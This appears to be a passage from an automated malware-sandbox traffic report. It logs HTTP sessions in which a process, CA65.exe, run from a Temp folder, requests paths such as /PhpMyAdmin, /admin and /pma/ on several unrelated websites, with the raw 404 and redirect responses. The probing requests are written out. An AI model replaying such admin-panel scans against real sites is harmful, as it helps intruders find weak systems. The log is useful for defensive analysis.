2023-12-22 20:15:16 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 2d 69 74 61 6c 69 63 22 3e 65 6e 20 4e 6f 72 64 20 2d 20 50 61 73 2d 64 65 2d 43 61 6c 61 69 73 20 65 74 20 46 72 6f 6e 74 69 c3 a8 72 65 20 42 65 6c 67 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 20 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2d 2d 68 6f 6d 65 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 70 61 Data Ascii: 2000t-italic">en Nord - Pas-de-Calais et Frontire Belge</span> </h1> </div> </div></div><main class="o-main" role="main" id="main"> <div class="o-main-content o-main-content--home" id="content"> <div class="uk-pa
2023-12-22 20:15:16 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2023-12-22 20:15:16 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:16 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 75 6b 2d 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 6d 6f 62 69 6c 2d 68 6f 6d 65 73 2d 6e 65 75 66 2f 65 75 72 6f 70 61 22 3e 3c 69 6d 67 20 64 61 74 61 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2f 66 69 6c 65 73 2f 38 32 31 35 2f 38 38 37 35 2f 38 38 34 37 2f 6c 6f 67 6f 2d 6d 61 72 71 75 65 2d 65 75 72 6f 70 61 2e 6a Data Ascii: 2000 <li class="uk-text-center"> <a href="https://www.flandria-loisirs.com/mobil-homes-neuf/europa"><img data-src="https://www.flandria-loisirs.com/application/files/8215/8875/8847/logo-marque-europa.j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
354	192.168.2.4	59892	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	178	OUT	GET /PhpMyAdmin HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	658	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: 3cf0d346-24c0-4780-b601-59ed24b28086 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kBDGe4N4EnUc3pAeo1cJ45pHobdSxTR8RSqMxJRPbDiq8%2B1PtdDSgDzocUSwZK1pJW2JfnMxpp2cBGTD1m7zwwYSVb3XJlTH5gCr298XGCSfgmdydSGcO2mMHM%2B0tKYlayF1FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0929f8d88d97-MIA
2023-12-22 20:15:15 UTC	711	IN	Data Raw: 32 61 36 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 47 72 6f 75 70 20 3d 20 22 74 68 65 6e 69 6c Data Ascii: 2a68<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au"; window.SiteEnvironment = "production"; window.SiteGroup = "thenil
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 65 6e 64 65 72 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 69 6e 67 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 54 6f 6b 65 6e 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 41 75 74 68 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 Data Ascii: : "5e860f35a7c8944203978db72ce66913", prerender: { rendering: false, domain: "https:\/\/www.thenile.com.au" }, userToken: "", }; window.Auth = false; wind
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 6c 65 2e 69 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 Data Ascii: rset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> Whoops... that page doesnt exist. 404 Error. </title><link rel="preconnect" href="//images.thenile.io"><link rel="preconnect"
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 6f 6d 6d 61 6e 64 42 75 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 6e 2d 68 65 61 64 65 72 20 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6d 61 6c 6c 2d 33 20 6d 65 64 69 75 6d 2d 33 20 63 6f 6c 75 6d 6e 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 2d 6d 65 6e 75 Data Ascii: at TheNile.com.au with Free 30 Day Returns!"><script src="https://js.stripe.com/v3/"></script></head><body ng-app="tnApp" ng-controller="CommandBus"><div class="row tn-header collapse"><div class="small-3 medium-3 columns"><div class="category-menu
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 35 30 20 31 31 31 76 36 34 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 36 37 63 2d 37 20 39 2e 30 38 30 32 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 73 34 20 31 2e 30 30 38 39 20 37 20 31 2e 30 30 38 39 63 30 20 30 2d 35 2e 35 20 37 2e 35 36 36 38 2d 31 34 20 31 30 2e 35 39 33 35 20 30 20 30 20 38 2e 35 20 32 2e 35 32 32 33 20 31 30 2e 35 20 32 2e 30 31 37 38 20 30 20 30 2d 38 20 31 30 2e 32 36 34 2d 31 36 2e 35 20 31 33 2e 37 36 34 20 30 20 30 20 36 2e 35 20 33 2e 33 38 37 20 39 2e 35 20 33 2e Data Ascii: " stroke-width="10" stroke-linecap="round" stroke-linejoin="round" d="M350 111v64" /><path d="M350 67c-7 9.0802-13.5 13.1158-13.5 13.1158s4 1.0089 7 1.0089c0 0-5.5 7.5668-14 10.5935 0 0 8.5 2.5223 10.5 2.0178 0 0-8 10.264-16.5 13.764 0 0 6.5 3.387 9.5 3.
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 75 72 6c 28 23 61 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 37 20 37 33 63 2d 32 2e 31 36 37 20 31 2e 35 2d 31 30 2e 32 20 35 2d 31 39 20 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 20 38 34 2e 35 63 2d 33 20 32 2e 31 36 36 37 2d 31 36 2e 31 20 36 2e 38 2d 33 30 2e 35 20 36 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 33 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 33 20 39 36 2e 35 63 2d 32 2e 38 33 33 20 33 2d 31 35 2e 33 20 38 2e 39 2d 33 36 2e 35 20 38 2e 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 34 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 38 20 31 Data Ascii: url(#a)"><path d="M357 73c-2.167 1.5-10.2 5-19 5" stroke="url(#paint2_linear)" /><path d="M361 84.5c-3 2.1667-16.1 6.8-30.5 6" stroke="url(#paint3_linear)" /><path d="M363 96.5c-2.833 3-15.3 8.9-36.5 8.5" stroke="url(#paint4_linear)" /><path d="M368 1
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 6c 65 20 63 78 3d 22 33 31 35 22 20 63 79 3d 22 31 33 30 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 35 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 30 38 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 39 33 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 64 65 66 73 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 30 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 34 22 20 79 31 3d 22 31 32 31 22 20 78 32 3d 22 33 30 35 22 20 79 32 Data Ascii: le cx="315" cy="130" r="2" fill="url(#paint15_linear)" /><circle cx="308" cy="152" r="2" fill="url(#paint16_linear)" /><circle cx="393" cy="152" r="2" fill="url(#paint17_linear)" /><defs><linearGradient id="paint0_linear" x1="394" y1="121" x2="305" y2
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 39 2e 32 35 22 20 79 31 3d 22 31 32 31 22 20 78 32 3d 22 33 34 39 2e 32 35 22 20 79 32 3d 22 31 33 36 2e 39 31 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 35 31 22 Data Ascii: Gradient><linearGradient id="paint6_linear" x1="349.25" y1="121" x2="349.25" y2="136.913" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint7_linear" x1="351"
2023-12-22 20:15:15 UTC	570	IN	Data Raw: 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 33 38 22 20 79 31 3d 22 38 31 22 20 78 32 3d 22 33 33 38 22 20 79 32 3d 22 38 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 34 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 38 37 22 20 79 31 3d 22 31 33 30 22 20 78 32 3d 22 33 38 37 22 20 79 32 3d 22 31 33 34 22 20 Data Ascii: radient id="paint13_linear" x1="338" y1="81" x2="338" y2="85" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint14_linear" x1="387" y1="130" x2="387" y2="134"
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 31 62 34 62 0d 0a 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 30 38 22 20 79 31 3d 22 31 35 30 22 20 78 32 3d 22 33 30 38 22 20 79 32 3d 22 31 35 34 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 33 22 20 79 31 3d 22 31 35 30 22 20 78 Data Ascii: 1b4b<linearGradient id="paint16_linear" x1="308" y1="150" x2="308" y2="154" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint17_linear" x1="393" y1="150" x

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.4	60182	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	169	OUT	GET /admin HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	621	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:15 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/admin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fl57eVmBjmtE7p9hvaLj9FqaL3YfljjOo9VEAz6zo%2BXt7NCjGw1FiGt%2FXx9%2F%2B4wNbeVPedPk6YAfLhVjBkWaP9M98S2ivRJJCkhPIymLWdEMQe588p0Yo5NKZ5XqZjSZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b092afd2a5c65-MIA
2023-12-22 20:15:15 UTC	246	IN	Data Raw: 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/admin">here</a>.</p></body></html>
2023-12-22 20:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
356	192.168.2.4	59583	35.197.165.27	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	183	OUT	GET /pma/ HTTP/1.1 Host: www.conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:16 UTC	698	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/" cache-control: no-cache, must-revalidate, max-age=0 x-cacheable: yes x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.357809cc79cfd436f9911313d967e82f,fed_ x-litespeed-cache: miss transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:16 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:16 UTC	670	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 71 75 65 73 74 61 63 63 6f 75 6e 74 69 6e 67 2e 63 6f 6d 2e 61 75 2f 70 6d 61 2f 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 Data Ascii: 10000<!DOCTYPE html><html lang="en-US" class="no-js "><head><meta charset="UTF-8" /><link rel="alternate" hreflang="en-US" href="https://www.conquestaccounting.com.au/pma/"/><meta name='robots' content='noindex, follow' /><script type="text/java
2023-12-22 20:15:16 UTC	14994	IN	Data Raw: 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 38 2f 63 6f 6e 71 75 65 73 74 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f Data Ascii: ><link rel="apple-touch-icon" href="//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/uploads/2016/08/conquest-favicon.png" />... This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page no
2023-12-22 20:15:16 UTC	16384	IN	Data Raw: 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 Data Ascii: size: 1.5em;line-height: 1.6;}</style><link rel='stylesheet' id='contact-form-7-css' href='//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' type='text/css' media='all' /><link rel='styleshee
2023-12-22 20:15:16 UTC	16384	IN	Data Raw: 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f Data Ascii: isabled,.button-round a.button.alt:disabled:hover,.button-round a.button.alt:disabled[disabled],.button-round a.button.alt:disabled[disabled]:hover,.button-round button.button.alt.disabled,.button-round button.button.alt.disabled:hover,.button-round butto
